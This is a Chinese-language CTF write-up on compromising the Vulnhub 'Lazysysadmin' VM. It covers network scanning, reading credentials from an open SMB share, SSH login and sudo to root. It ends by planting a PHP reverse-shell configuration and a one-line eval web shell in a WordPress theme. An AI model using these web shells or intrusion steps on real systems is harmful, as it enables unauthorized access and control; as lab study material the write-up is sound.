VM - Lazysysadmin 的破解

青蛙愛輪滑發表於2018-08-24

本文主要記錄對 Lazysysadmin 的滲透學習過程,測試的 VM 主機主要來源 www.vulnhub.com
部落格集:面向 CTF 的 VM 破解系列
下載連結: Lazysysadmin

1. ip 探測

  1. ip 探測

    使用 netdiscover,由於在內網,可以直接掃網網段

     root@kali:~# netdiscover -r 10.10.10.0/24
      Currently scanning: Finished!   |   Screen View: Unique Hosts                            
     																						  
      5 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 300                          
      _____________________________________________________________________________
        IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
      -----------------------------------------------------------------------------
      10.10.10.1      00:50:56:c0:00:08      2     120  VMware, Inc.                           
      10.10.10.2      00:50:56:e5:a6:4e      1      60  VMware, Inc.                           
      10.10.10.133    00:0c:29:9e:53:39      1      60  VMware, Inc.                           
      10.10.10.254    00:50:56:ea:fa:42      1      60  VMware, Inc.  
    

    發現 ip 地址為 10.10.10.133

  2. 埠掃描

    使用 masscan ,可以進行限速

     root@kali:~# masscan 10.10.10.133 -p1-1000 --rate=10000
     
     Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-08-16 13:16:13 GMT
      -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
     Initiating SYN Stealth Scan
     Scanning 1 hosts [1000 ports/host]
     Discovered open port 22/tcp on 10.10.10.133                                    
     Discovered open port 80/tcp on 10.10.10.133                                    
     Discovered open port 139/tcp on 10.10.10.133                                   
     Discovered open port 445/tcp on 10.10.10.133  
    
  3. 掃描埠和服務

    使用 nmap 掃描

     root@kali:~# nmap -T4 -A -v 10.10.10.133 -p0-10000
     Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 09:18 EDT
     NSE: Loaded 148 scripts for scanning.
     NSE: Script Pre-scanning.
     Initiating NSE at 09:18
     Completed NSE at 09:18, 0.00s elapsed
     Initiating NSE at 09:18
     Completed NSE at 09:18, 0.00s elapsed
     Initiating ARP Ping Scan at 09:18
     Scanning 10.10.10.133 [1 port]
     Completed ARP Ping Scan at 09:18, 0.04s elapsed (1 total hosts)
     Initiating Parallel DNS resolution of 1 host. at 09:18
     Completed Parallel DNS resolution of 1 host. at 09:18, 0.02s elapsed
     Initiating SYN Stealth Scan at 09:18
     Scanning 10.10.10.133 (10.10.10.133) [10001 ports]
     Discovered open port 3306/tcp on 10.10.10.133
     Discovered open port 22/tcp on 10.10.10.133
     Discovered open port 139/tcp on 10.10.10.133
     Discovered open port 445/tcp on 10.10.10.133
     Discovered open port 80/tcp on 10.10.10.133
     Discovered open port 6667/tcp on 10.10.10.133
     Completed SYN Stealth Scan at 09:18, 1.41s elapsed (10001 total ports)
     Initiating Service scan at 09:18
     Scanning 6 services on 10.10.10.133 (10.10.10.133)
     Completed Service scan at 09:19, 11.03s elapsed (6 services on 1 host)
     Initiating OS detection (try #1) against 10.10.10.133 (10.10.10.133)
     NSE: Script scanning 10.10.10.133.
     Initiating NSE at 09:19
     Completed NSE at 09:19, 10.27s elapsed
     Initiating NSE at 09:19
     Completed NSE at 09:19, 0.01s elapsed
     Nmap scan report for 10.10.10.133 (10.10.10.133)
     Host is up (0.00088s latency).
     Not shown: 9995 closed ports
     PORT     STATE SERVICE     VERSION
     22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
     | ssh-hostkey: 
     |   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
     |   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
     |   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
     |_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
     80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
     |_http-generator: Silex v2.2.7
     | http-methods: 
     |_  Supported Methods: OPTIONS GET HEAD POST
     | http-robots.txt: 4 disallowed entries 
     |_/old/ /test/ /TR2/ /Backnode_files/
     |_http-server-header: Apache/2.4.7 (Ubuntu)
     |_http-title: Backnode
     139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
     445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
     3306/tcp open  mysql       MySQL (unauthorized)
     6667/tcp open  irc         InspIRCd
     | irc-info: 
     |   server: Admin.local
     |   users: 1
     |   servers: 1
     |   chans: 0
     |   lusers: 1
     |   lservers: 0
     |   source ident: nmap
     |   source host: 10.10.10.128
     |_  error: Closing link: (nmap@10.10.10.128) [Client exited]
     MAC Address: 00:0C:29:9E:53:39 (VMware)
     Device type: general purpose
     Running: Linux 3.X|4.X
     OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
     OS details: Linux 3.2 - 4.9
     Uptime guess: 0.008 days (since Thu Aug 16 09:07:34 2018)
     Network Distance: 1 hop
     TCP Sequence Prediction: Difficulty=259 (Good luck!)
     IP ID Sequence Generation: All zeros
     Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
     Host script results:
     |_clock-skew: mean: -3h20m00s, deviation: 5h46m24s, median: 0s
     | nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
     | Names:
     |   LAZYSYSADMIN<00>     Flags: <unique><active>
     |   LAZYSYSADMIN<03>     Flags: <unique><active>
     |   LAZYSYSADMIN<20>     Flags: <unique><active>
     |   WORKGROUP<00>        Flags: <group><active>
     |_  WORKGROUP<1e>        Flags: <group><active>
     | smb-os-discovery: 
     |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
     |   Computer name: lazysysadmin
     |   NetBIOS computer name: LAZYSYSADMIN\x00
     |   Domain name: \x00
     |   FQDN: lazysysadmin
     |_  System time: 2018-08-16T23:19:03+10:00
     | smb-security-mode: 
     |   account_used: guest
     |   authentication_level: user
     |   challenge_response: supported
     |_  message_signing: disabled (dangerous, but default)
     | smb2-security-mode: 
     |   2.02: 
     |_    Message signing enabled but not required
     | smb2-time: 
     |   date: 2018-08-16 09:19:03
     |_  start_date: N/A
    
     TRACEROUTE
     HOP RTT     ADDRESS
     1   0.88 ms 10.10.10.133 (10.10.10.133)
    
     NSE: Script Post-scanning.
     Initiating NSE at 09:19
     Completed NSE at 09:19, 0.00s elapsed
     Initiating NSE at 09:19
     Completed NSE at 09:19, 0.00s elapsed
     Read data files from: /usr/bin/../share/nmap
     OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
     Nmap done: 1 IP address (1 host up) scanned in 28.49 seconds
     		   Raw packets sent: 10024 (441.850KB) | Rcvd: 10017 (401.394KB)
    
  4. 爆破目錄

    使用 dirb 爆破目錄

     root@kali:~# dirb http://10.10.10.133 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o Desktop/result.txt
    
  5. 獲取伺服器的 banner 資訊

     root@kali:~# curl -I 10.10.10.133
     HTTP/1.1 200 OK
     Date: Thu, 16 Aug 2018 13:29:36 GMT
     Server: Apache/2.4.7 (Ubuntu)
     Last-Modified: Sun, 06 Aug 2017 05:02:15 GMT
     ETag: "8ce8-5560ea23d23c0"
     Accept-Ranges: bytes
     Content-Length: 36072
     Vary: Accept-Encoding
     Content-Type: text/html
    
  6. 使用 wpscan 掃描

     root@kali:~# wpscan -u http://10.10.10.133/wordpress --force
    
  7. 使用 enum4linux 掃描

     root@kali:~# enum4linux 10.10.10.133
    
  8. 獲取共享資源

    win 下

     net user k" \\10.10.10.133\share
    

    linux 下

     root@kali:~# mount -t cifs -o username='',password='' //10.10.10.133/share$ /mnt
     root@kali:~# cd /mnt/
    

    發現了兩個重要檔案 deets.txt 和 wp-config.php

     root@kali:/mnt# cat deets.txt 
     	CBF Remembering all these passwords.
     	Remember to remove this file and update your password after we push out the server.
     	Password 12345
     root@kali:/mnt/wordpress# cat wp-config.php 
     	// ** MySQL settings - You can get this info from your web host ** //
     	/** The name of the database for WordPress */
     	define('DB_NAME', 'wordpress');
    
     	/** MySQL database username */
     	define('DB_USER', 'Admin');
    
     	/** MySQL database password */
     	define('DB_PASSWORD', 'TogieMYSQL12345^^');
    
     	/** MySQL hostname */
     	define('DB_HOST', 'localhost');
    
     	/** Database Charset to use in creating database tables. */
     	define('DB_CHARSET', 'utf8');
    
     	/** The Database Collate type. Don't change this if in doubt. */
     	define('DB_COLLATE', '');
    

    上述發現敏感檔案,密碼為 12345,mysql 使用者名稱和密碼為 Admin:TogieMYSQL12345^^

  9. 登入 ssh

    登入 phpmyadmin
    訪問 wordpress 頁面發現提示使用者名稱為 togie,使用 ssh 登入

     ssh togie@10.10.10.133
    

    登入成功

     togie@LazySysAdmin:~$ whoami
     togie
     togie@LazySysAdmin:~$ id
     uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
     togie@LazySysAdmin:~$ sudo su
     [sudo] password for togie: 
     root@LazySysAdmin:/home/togie# 
    

    檢視 flag

     root@LazySysAdmin:~# cat proof.txt 
    
  10. 登入 wordpress

    在管理頁面的 Apperance -> Editor ,修改 404 頁面的模板

    新增內容:

    set_time_limit (0);
    $VERSION = "1.0";
    $ip = '10.10.10.128';
    $port = '4444';
    $CHUNK_size = 1400;
    $write_a = null;
    $error_a = null;
    $shell = 'uname -a;w;id;/bin/sh -i';
    $darmon = 0;
    $debug = 0;
    

    kali 設定反彈,獲取到初始的 shell 環境

    或者修改為一句話木馬,使用菜刀連線

    <?php eval($_POST[pass]);?>

    http://10.10.10.133/wordpress/wp-content/themes/twentyfifteen/404.php
    提示 no tty present and no asdpass program spacified

    可以使用 python -c ‘import pty; pty.spawn("/bin/sh")’,將初始的 shell 切換為 bash shell 環境

相關文章